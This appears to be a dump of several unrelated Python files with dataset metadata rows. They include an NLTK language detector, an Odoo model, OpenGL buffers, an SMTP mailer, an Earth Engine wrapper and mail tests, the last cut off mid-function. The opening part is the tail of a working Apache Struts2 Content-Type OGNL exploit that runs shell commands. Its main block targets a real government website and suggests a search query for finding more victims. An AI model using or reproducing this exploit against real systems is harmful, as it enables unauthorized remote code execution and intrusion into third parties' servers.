        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
        try:
            headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
            # Python 3 moved Request/urlopen into the urllib.request submodule
            request = urllib.request.Request(url, headers=headers)
            page = urllib.request.urlopen(request).read()
        except http.client.IncompleteRead as e:
            # keep whatever partial body was received before the cut-off
            page = e.partial
        print(page)
        return page
if __name__ == '__main__':
    # Candidate URLs can be found by searching for "inurl:.action".
    target = "http://www.ly.gov.tw/innerIndex.action"
    poc = Structs2_45()
    if poc.validate(target):
        poc.exploit(target, 'ls -lht')
a38e46758a08d8aa58e2cec40e436999a9751e25 | 3,133 | py | Python | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Aufgaben 6, 7, 20, 21, 24, 30, 34, 39, 38, 41, 43 Bis Dienstag
# -----------------
# 43 detect language
# -----------------
import nltk, re
from nltk import word_tokenize
# UDHR corpus samples used as reference texts; file ids are '<name>-Latin1'.
languages = ['Chickasaw', 'English', 'German_Deutsch', 'Greenlandic_Inuktikut', 'Hungarian_Magyar', 'Ibibio_Efik']
def word_frequency(text):
    """Return a case-folded nltk.FreqDist for *text*.

    Args:
        text: either a raw string (tokenized with word_tokenize first) or an
            already-tokenized sequence of words.
    """
    tokens = text
    # idiomatic type test instead of comparing type objects
    if isinstance(text, str):
        tokens = word_tokenize(text)
    freq = nltk.FreqDist(w.lower() for w in tokens)
    return freq
def get_lang_list():
    """Build a mapping of language name -> words ordered by frequency.

    Reference texts come from the UDHR corpus.  Tokens without at least one
    word character are dropped so punctuation does not pollute the lists.
    """
    vocab_by_language = {}
    for language in languages:
        corpus_words = nltk.corpus.udhr.words(language + '-Latin1')
        ranked = word_frequency(corpus_words).most_common()
        vocab_by_language[language] = [w for w, _ in ranked if re.findall(r'\w', w)]
    return vocab_by_language
def which_lang(string):
    """Guess which reference language *string* is written in.

    Scores every language by the overlap between the input's word set and
    that language's reference vocabulary, then reports the best match.
    """
    ranked = word_frequency(string).most_common()
    input_words = {w for w, _ in ranked if re.findall(r'\w', w)}
    reference = get_lang_list()
    scores = {lang: len(input_words & set(reference[lang])) for lang in languages}
    return 'Your Text is written in "{}"'.format(max(scores, key=scores.get))
input_txt = {
'german': 'Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen? Aber wer hat irgend ein Recht, einen Menschen zu tadeln, der die Entscheidung trifft, eine Freude zu genießen, die keine unangenehmen Folgen hat, oder einen, der Schmerz vermeidet, welcher keine daraus resultierende Freude nach sich zieht? Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen?',
'english': 'A wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me.'
}
print(which_lang(input_txt['english']))
| 68.108696 | 960 | 0.735078 | 490 | 3,133 | 4.630612 | 0.508163 | 0.026443 | 0.009696 | 0.010577 | 0.278537 | 0.266197 | 0.266197 | 0.250331 | 0.250331 | 0.250331 | 0 | 0.010878 | 0.178423 | 3,133 | 45 | 961 | 69.622222 | 0.870629 | 0.044686 | 0 | 0 | 0 | 0.068966 | 0.644556 | 0.007035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.275862 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a39c278901ee2bd5c1dabec535b621519f966348 | 543 | py | Python | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 57 | 2020-06-22T05:28:11.000Z | 2022-03-25T08:15:08.000Z | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 2 | 2020-11-20T07:11:27.000Z | 2022-03-30T00:20:29.000Z | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 29 | 2020-07-04T15:24:01.000Z | 2022-03-28T01:29:03.000Z | from odoo import models, fields, api
class DemoHierarchyTutorial(models.Model):
    """Demo model showing a self-referencing parent/child hierarchy."""
    _name = 'demo.hierarchy'
    _description = 'Demo Hierarchy Tutorial'
    # Record label; indexed to speed up name lookups.
    name = fields.Char(string='name', index=True)
    # Parent record of the same model (self-referencing many2one).
    parent_id = fields.Many2one('demo.hierarchy', string='Related Partner', index=True)
    # Read-only mirror of the parent's name via a related field.
    parent_name = fields.Char(related='parent_id.name', readonly=True, string='Parent name')
    # Inverse side of parent_id, restricted to active children.
    child_ids = fields.One2many('demo.hierarchy', 'parent_id', string='Contacts', domain=[('active', '=', True)])
| 45.25 | 113 | 0.71639 | 66 | 543 | 5.787879 | 0.484848 | 0.136126 | 0.073298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004255 | 0.134438 | 543 | 11 | 114 | 49.363636 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.244936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a3a1db0c83fb48e078eb89e46de0dc28dfa86155 | 3,850 | py | Python | growth/microscopy/images.py | sebastianbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | 1 | 2022-03-01T14:48:14.000Z | 2022-03-01T14:48:14.000Z | growth/microscopy/images.py | sbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | null | null | null | growth/microscopy/images.py | sbernasek/growth | 6d1cace75b19ad8b6130d0940584c24dd26bbe91 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy
from ..measure import ConditionedLognormalSampler
class ScalarImage:
    """
    Class containing a scalar image.
    """

    def __init__(self, height=1000, width=1000):
        """ Instantiate scalar image with shape (<height>, <width>). """
        self.height = height
        self.width = width
        self.initialize()

    @property
    def shape(self):
        """ Image shape, (height, width). """
        return self.im.shape[-2:]

    @property
    def pixels(self):
        """ Returns flattened image pixels. """
        return self.im.ravel()

    @property
    def max(self):
        """ Maximum pixel intensity. """
        return self.im.max()

    @property
    def im_normalized(self):
        """ Image normalized by the maximum value. """
        return self.im/self.max

    def percentile(self, q):
        """ Returns the q-th percentile of pixel intensities. """
        return np.percentile(self.im.ravel(), q=q)

    def initialize(self):
        """ Initialize blank (all-zero) image. """
        self.im = np.zeros((self.height, self.width), dtype=np.float64)

    def fill(self, mu=0.1, sigma=0.1):
        """
        Fill image background with values sampled from a lognormal distribution.

        Args:

            mu (float) - mean of underlying normal distribution

            sigma (float) - std dev of underlying normal distribution

        """
        pixels = np.exp(np.random.normal(np.log(mu), sigma, size=self.shape))
        self.im[:, :] = pixels

    @staticmethod
    def _render(im, vmin=0, vmax=None, cmap=plt.cm.Greys, size=5, ax=None):
        """
        Render image.

        Args:

            im (np.ndarray[float]) - image

            vmin, vmax (int) - colormap bounds

            cmap (matplotlib.ColorMap or str) - if value is 'r', 'g', or 'b', use RGB colorscheme

            size (int) - image panel size, in inches

            ax (matplotlib.axes.AxesSubplot) - if None, create figure

        """
        if ax is None:
            fig, ax = plt.subplots(figsize=(size, size))
        if vmax is None:
            vmax = im.max()

        # render image
        if isinstance(cmap, str):
            # membership in the string 'rgb' would wrongly accept substrings
            # like 'rg'; test against the individual channel names instead
            assert cmap in ('r', 'g', 'b'), 'Color not recognized.'
            im_rgb = np.zeros(im.shape+(3,), dtype=np.float64)
            # place the scaled intensities into the selected RGB channel,
            # clipping anything above the colormap ceiling
            im_rgb[:, :, 'rgb'.index(cmap)] = (im-vmin)/(vmax-vmin)
            im_rgb[im_rgb > 1.] = 1.
            ax.imshow(im_rgb)
        else:
            ax.imshow(im, vmin=vmin, vmax=vmax, cmap=cmap)

        # invert axis and remove ticks
        ax.invert_yaxis()
        ax.axis('off')

    def render(self, **kwargs):
        """ Render image. Keyword arguments are passed to _render. """
        self._render(self.im.T, **kwargs)

    def render_blank(self, **kwargs):
        """ Render a blank (all-zero) image of the same shape. """
        self._render(np.zeros(self.shape, dtype=int), **kwargs)

    def center_xycoords(self, xy, shrinkage=0.9):
        """ Project zero-centered coordinates to center of image.

        Args:

            xy (np.ndarray[float]) - zero-centered (x, y) coordinates,
                assumed roughly in [-1, 1] (TODO confirm with callers)

            shrinkage (float) - fraction of the image half-width spanned

        Returns:

            np.ndarray[int] - integer pixel coordinates

        """
        center_x, center_y = self.shape[0]/2, self.shape[1]/2
        # deepcopy so the caller's array is left unmodified
        centered_xy = deepcopy(xy)
        centered_xy[:, 0] = ((xy[:, 0]*center_x*shrinkage) + center_x)
        centered_xy[:, 1] = ((xy[:, 1]*center_y*shrinkage) + center_y)
        return centered_xy.astype(int)
class DependentScalarImage(ScalarImage):
    """
    Class defines a scalar image whose pixel intensities are sampled with some dependence upon another scalar image.
    """

    def __init__(self, pixels, mean, sigma):
        """ Instantiate a dependent scalar image conditioned on <pixels>. """
        super().__init__(*pixels.shape)
        log_pixels = np.log(pixels.ravel())
        self.sampler = ConditionedLognormalSampler(log_pixels, np.log(mean), sigma)

    def fill(self, rho=0.0):
        """ Populate the image with values sampled at correlation <rho>. """
        sampled = self.sampler.sample(rho=rho)
        self.im[:, :] = sampled.reshape(self.shape)
| 29.166667 | 116 | 0.58 | 476 | 3,850 | 4.619748 | 0.323529 | 0.024557 | 0.021828 | 0.016371 | 0.048204 | 0.028195 | 0 | 0 | 0 | 0 | 0 | 0.013091 | 0.285714 | 3,850 | 131 | 117 | 29.389313 | 0.786545 | 0.279221 | 0 | 0.064516 | 0 | 0 | 0.01176 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 1 | 0.225806 | false | 0 | 0.064516 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a31d2b7e951a611f47c66f8f0512d348d90e5a | 2,674 | py | Python | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | PI/Platform/OpenGL/OpenGLBuffer.py | HotShot0901/PI | 7e6fd0f68b4222e09ea825f27709ec5b1e51e928 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null | from ...Renderer.Buffer import VertexBuffer, IndexBuffer, BufferLayout
from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData
from OpenGL.GL import GL_ARRAY_BUFFER, GL_STATIC_DRAW, GL_ELEMENT_ARRAY_BUFFER, GL_DYNAMIC_DRAW
import ctypes
import numpy as np
from multipledispatch import dispatch
class OpenGLVertexBuffer(VertexBuffer):
    """OpenGL-backed vertex buffer (VBO).

    Two overloaded constructors (via multipledispatch): from a list of
    vertex data (static draw, uploaded immediately) or from an int size
    (dynamic draw, data supplied later through SetData).
    """

    __slots__ = "__RendererID", "__itemsize", \
        "__Layout"

    @dispatch(list)
    def __init__(self, vertices: list) -> None:
        # Static buffer: convert to float32 and upload immediately.
        vertices: np.ndarray = np.array(vertices, dtype=np.float32)
        self.__itemsize = vertices.itemsize
        self.__RendererID = glGenBuffers(1)
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)

    @dispatch(int)
    def __init__(self, size: int) -> None:
        # Dynamic buffer: allocate zeroed storage; contents set via SetData.
        vertices = np.zeros((size,))
        # NOTE(review): here __itemsize is set to the element *count*,
        # while the list overload stores the per-element byte size —
        # looks inconsistent; confirm which meaning callers rely on.
        self.__itemsize = size
        self.__RendererID = glGenBuffers(1)
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, ctypes.c_void_p(None), GL_DYNAMIC_DRAW)

    def __del__(self) -> None:
        # Release the GL buffer object when the Python wrapper dies.
        glDeleteBuffers(1, [self.__RendererID])

    @property
    def itemsize(self) -> int:
        return self.__itemsize

    @property
    def RendererID(self) -> int:
        return self.__RendererID

    def Bind(self) -> None:
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)

    def Unbind(self) -> None:
        glBindBuffer(GL_ARRAY_BUFFER, 0)

    def SetLayout(self, layout: BufferLayout) -> None:
        self.__Layout = layout

    def SetData(self, data: np.ndarray) -> None:
        # Overwrite buffer contents from the start; buffer must already be
        # allocated large enough (see the int constructor).
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        glBufferSubData(GL_ARRAY_BUFFER, 0, data.nbytes, data.tobytes())

    @property
    def Layout(self) -> BufferLayout:
        # NOTE(review): raises AttributeError if SetLayout was never called.
        return self.__Layout
class OpenGLIndexBuffer(IndexBuffer):
    """OpenGL-backed index (element) buffer, uploaded once as static data."""

    __RendererID : int
    __Count : int

    def __init__(self, indices: list) -> None:
        # Indices are stored as unsigned 32-bit ints on the GPU.
        indices: np.ndarray = np.array(indices, dtype=np.uint32)
        self.__Count = len(indices)
        self.__RendererID = glGenBuffers(1)
        self.Bind()
        glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)

    def __del__(self) -> None:
        # Release the GL buffer object when the Python wrapper dies.
        glDeleteBuffers(1, [self.__RendererID])

    @property
    def RendererID(self) -> int:
        return self.__RendererID

    @property
    def Count(self) -> int:
        # Number of indices uploaded (used for draw calls).
        return self.__Count

    def Bind(self) -> None:
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)

    def Unbind(self) -> None:
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
| 30.386364 | 96 | 0.686612 | 300 | 2,674 | 5.74 | 0.21 | 0.083043 | 0.067944 | 0.07259 | 0.384437 | 0.384437 | 0.367596 | 0.304878 | 0.255517 | 0.255517 | 0 | 0.005728 | 0.21653 | 2,674 | 87 | 97 | 30.735632 | 0.816229 | 0 | 0 | 0.375 | 0 | 0 | 0.011219 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.09375 | 0.078125 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a3535a3760b4a669fc2666b8b59489756d4ecc | 2,292 | py | Python | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 35 | 2015-01-06T12:01:38.000Z | 2022-01-22T13:57:26.000Z | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 1 | 2021-06-24T13:21:16.000Z | 2021-07-06T18:46:06.000Z | src/shinymud/lib/shinymail.py | shinymud/ShinyMUD | 3f659d8be4468c9a8745b8797f5f96c2bc86533c | [
"MIT"
] | 8 | 2015-02-04T16:30:52.000Z | 2021-02-03T15:02:38.000Z | from shinymud.data.config import EMAIL_HOST, EMAIL_PORT, EMAIL_HOST_USER,\
EMAIL_HOST_PASSWORD, EMAIL_USE_TLS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
class ShinyMail(object):
    """ShinyMail constructs and sends emails via the configured SMTP host."""

    def __init__(self, to, subject, message='', from_addr=None):
        """Initialize our mail object.

        to - a list of email addresses
        subject - a string containing the email subject
        message - a string containing the body of the email message (optional)
        from_addr - a string containing the from address (optional, will be
        replaced with EMAIL_HOST_USER from the shinymud config file if not given)
        """
        self.email = MIMEMultipart()
        self.email['Subject'] = subject
        self.email['To'] = ', '.join(to)
        self.email['From'] = from_addr or EMAIL_HOST_USER
        # Keep the recipient *list* for the SMTP envelope: smtplib treats a
        # bare string as a single address, so the joined header value must
        # not be used as the recipient argument of sendmail().
        self.to_addrs = list(to)
        self.message = message
        self.files = []

    def attach_text_file(self, filename, content):
        """Attach a text file with the given name and content to this email."""
        msg = MIMEText(content)
        msg.add_header('Content-Disposition', 'attachment', filename=filename)
        self.files.append(msg)

    def send(self):
        """Actually send the email over SMTP (TLS and login as configured).

        Raises on SMTP/connection errors; raises Exception if the email has
        no content at all (see _construct_email).
        """
        self._construct_email()
        con = smtplib.SMTP(EMAIL_HOST, EMAIL_PORT)
        # Removed set_debuglevel(1): it dumped the whole SMTP conversation
        # to stderr on every send.
        if EMAIL_USE_TLS:
            con.starttls()
        if EMAIL_HOST_USER and EMAIL_HOST_PASSWORD:
            # Don't bother logging in if USER and PASS don't exist
            con.login(EMAIL_HOST_USER, EMAIL_HOST_PASSWORD)
        # BUG FIX: previously passed the comma-joined 'To' header string,
        # which smtplib.sendmail interprets as ONE recipient; pass the real
        # list so every address receives the mail.
        con.sendmail(self.email['From'], self.to_addrs, self.email.as_string())
        con.quit()

    def _construct_email(self):
        """Construct the email in a sensible order.

        Make sure the message text comes before any extra attachments.
        """
        if self.message:
            self.email.attach(MIMEText(self.message))
        for f in self.files:
            self.email.attach(f)
        if not self.email.get_payload():
            # Don't let people send blank emails. That's mean.
            raise Exception("You can't send an email without any content!")
| 37.57377 | 82 | 0.622164 | 291 | 2,292 | 4.75945 | 0.38488 | 0.064982 | 0.046931 | 0.043321 | 0.043321 | 0.043321 | 0 | 0 | 0 | 0 | 0 | 0.000612 | 0.286649 | 2,292 | 60 | 83 | 38.2 | 0.846483 | 0.280541 | 0 | 0 | 0 | 0 | 0.061039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.088235 | 0.117647 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a3a46a9a0fdd89369c89e52d5dff21ccc01d5867 | 222 | py | Python | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | 4 | 2017-09-13T07:10:09.000Z | 2019-01-26T17:15:29.000Z | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | null | null | null | other/backpack.py | DanilaDanila/lessons | c9c2273e9cd6a8013c21eb889fc6a61f9cc3dfb7 | [
"MIT"
] | 4 | 2018-09-16T08:30:01.000Z | 2018-10-02T19:06:26.000Z | r = int(input())
w = [int(x) for x in input().split()]
c = [int(x) for x in input().split()]
m = [0]
for i in range(1, r + 1):
m.append(max([x[0] + m[i - x[1]] for x in zip(c, w) if x[1] <= i], default = 0))
print(m)
| 24.666667 | 84 | 0.509009 | 51 | 222 | 2.215686 | 0.392157 | 0.106195 | 0.159292 | 0.141593 | 0.353982 | 0.353982 | 0.353982 | 0 | 0 | 0 | 0 | 0.040698 | 0.225225 | 222 | 8 | 85 | 27.75 | 0.616279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e55f659b3f5ad4fbe440e44abd370dbc1a901cb | 2,867 | py | Python | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | web/app/lib/earthengine/__init__.py | geary/claslite | 83c49cf98eceae633034b82d35ed7991d943b857 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Earth Engine interface
~~~~~~~~~~~~~~~~~~~~
:By Michael Geary - http://mg.to/
:See UNLICENSE or http://unlicense.org/ for public domain notice.
"""
import cgi, logging, sys, os
import ee
from oauth2client import appengine
from google.appengine.api import urlfetch, users
from google.appengine.ext import db
from tipfy import current_handler
from tipfy.utils import json_decode
class EarthEngine( object ):
    """Thin wrapper around the Earth Engine REST API for App Engine handlers.

    Uses sandbox + service-account credentials on the dev server and
    AppAssertionCredentials in production.
    """
    def __init__( self, handler ):
        self.url = handler.get_config( 'earth-engine', 'api' )
        account = handler.get_config( 'earth-engine', 'ee_account' )
        key = handler.get_config( 'earth-engine', 'ee_private_key_file' )
        # The App Engine dev server sets SERVER_SOFTWARE to a "Dev..." value.
        DEBUG_MODE = ('SERVER_SOFTWARE' in os.environ and
            os.environ['SERVER_SOFTWARE'].startswith('Dev'))
        if DEBUG_MODE:
            EE_API_URL = 'https://earthengine.sandbox.google.com'
            EE_CREDENTIALS = ee.ServiceAccountCredentials(account, key)
        else:
            EE_API_URL = 'https://earthengine.googleapis.com'
            EE_CREDENTIALS = appengine.AppAssertionCredentials(ee.OAUTH2_SCOPE)
        # Initialize the EE API
        EE_TILE_SERVER = EE_API_URL + '/map/'  # NOTE(review): local and unused afterwards
        ee.data.DEFAULT_DEADLINE = 60 * 20  # 20-minute request deadline
        logging.info('Initializing with ' + EE_API_URL)
        ee.Initialize(EE_CREDENTIALS, EE_API_URL)

    def _http( self, method, url, params=None ):
        """Issue an HTTP request against the configured API; never raises.

        Returns the decoded JSON on success, otherwise a dict of the form
        {'error': {'type': ..., [...]}}.
        """
        logging.info( 'EarthEngine %s:\n%s', url, params )
        try:
            response = urlfetch.fetch(
                method = method,
                url = self.url + url,
                payload = params,
                deadline = 10
            )
            if response.status_code == 200:
                json = json_decode( response.content )
            else:
                json = { 'error': { 'type':'http', 'code': response.status_code } }
        except urlfetch.DeadlineExceededError:
            json = { 'error': { 'type':'DeadlineExceededError' } }
        except urlfetch.DownloadError:
            json = { 'error': { 'type':'DownloadError' } }
        except urlfetch.ResponseTooLargeError:
            json = { 'error': { 'type':'ResponseTooLargeError' } }
        except:
            # Catch-all keeps the handler alive; note the `return` in
            # `finally` below also suppresses any exception still in flight.
            json = { 'error': { 'type':'Other' } }
        finally:
            return json

    def get( self, api, params=None ):
        # Query string built by plain concatenation: `params` must already
        # be URL-encoded by the caller.
        if params: url = api + '?' + params
        else: url = api
        return self._http( 'GET', url )

    def post( self, api, params=None ):
        return self._http( 'POST', api, params )
class EarthImage( object ):
    """Helper for building Earth Engine image-expression dictionaries."""
    def __init__( self ):
        pass

    def obj( self, type, id ):
        """A bare typed object reference."""
        return {
            'type': type,
            'id': id,
        }

    def step( self, creator, *args ):
        """An Image expression produced by applying `creator` to `args`."""
        return {
            'type': 'Image',
            'creator': creator,
            'args': args,
        }

    def clip( self, image ):
        """Clip `image` to the current session place's multipolygon.

        Returns `image` unchanged when there is no place, the place does
        not exist, or it is not owned by the current user.
        """
        key = db.Key( current_handler.session['current_place'] )
        if key is None:
            return image
        place = db.get( key )
        if place is None:
            return image
        if place.owner != current_handler.auth.user.auth_id:
            return image
        g = json_decode( place.geojson )
        coords = g['features'][0]['geometry']['coordinates']
        # NOTE(review): self.image is not defined on this class, so this
        # call raises AttributeError — presumably self.step was intended;
        # verify against callers before fixing.
        return self.image( 'ClipToMultiPolygon', image, coords )
| 27.04717 | 74 | 0.662714 | 360 | 2,867 | 5.141667 | 0.369444 | 0.016207 | 0.02161 | 0.034036 | 0.071853 | 0.031334 | 0 | 0 | 0 | 0 | 0 | 0.005628 | 0.19428 | 2,867 | 105 | 75 | 27.304762 | 0.795671 | 0.014998 | 0 | 0.088608 | 0 | 0 | 0.157539 | 0.015754 | 0 | 0 | 0 | 0 | 0.012658 | 0 | null | null | 0.025316 | 0.088608 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e575f91b4f65ce3d3bbf1ec3b977c4df6df2202 | 4,014 | py | Python | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | tests/coworks/blueprint/test_mail.py | sidneyarcidiacono/coworks | 7f51b83e8699ced991d16a5a43ad19e569b6e814 | [
"MIT"
] | null | null | null | import os
import smtplib
from email import message
from io import BytesIO
from unittest import mock
import pytest
from coworks import TechMicroService
from coworks.blueprint.mail_blueprint import Mail
from coworks.config import LocalConfig
# Module-level mocks shared by the tests below.
# Replace smtplib.SMTP so no real connection is opened; capture the login()
# and send_message() calls made inside the `with SMTP(...)` context manager.
smtp_mock = mock.MagicMock()
smtp_mock.return_value.__enter__.return_value.login = login_mock = mock.Mock()
smtp_mock.return_value.__enter__.return_value.send_message = send_mock = mock.Mock()

# Replace email.message.EmailMessage to capture add_attachment() calls.
email_mock = mock.MagicMock()
email_mock.return_value.add_attachment = add_mock = mock.Mock()
class MailMS(TechMicroService):
    """Minimal microservice exposing the Mail blueprint, for testing."""

    def __init__(self, **mail_names):
        super().__init__('mail', configs=LocalConfig())
        self.register_blueprint(Mail(**mail_names))

    def _check_token(self):
        # Bypass token authentication in tests.
        return True
class TestClass:
    """Tests for the Mail blueprint mounted on MailMS."""

    def test_wrong_init(self):
        # Without any SMTP_* configuration the blueprint cannot be created.
        with pytest.raises(OSError) as pytest_wrapped_e:
            app = MailMS()
            with app.test_client() as c:
                response = c.post('/send')
        assert pytest_wrapped_e.type == OSError

    @mock.patch.dict(os.environ, {
        "SMTP_SERVER": "mail.test.com:587",
        "SMTP_LOGIN": "myself@test.com",
        "SMTP_PASSWD": "passwd"
    })
    def test_wrong_params_explicit_names(self):
        # BUG FIX: this method previously had the same name as the next one
        # (test_wrong_params), so it was shadowed and never collected by
        # pytest. Renamed so both variants actually run.
        mail_names = {
            'env_server_var_name': 'SMTP_SERVER',
            'env_login_var_name': 'SMTP_LOGIN',
            'env_passwd_var_name': 'SMTP_PASSWD',
        }
        app = MailMS(**mail_names)
        with app.test_client() as c:
            data = {
                'subject': "Test",
            }
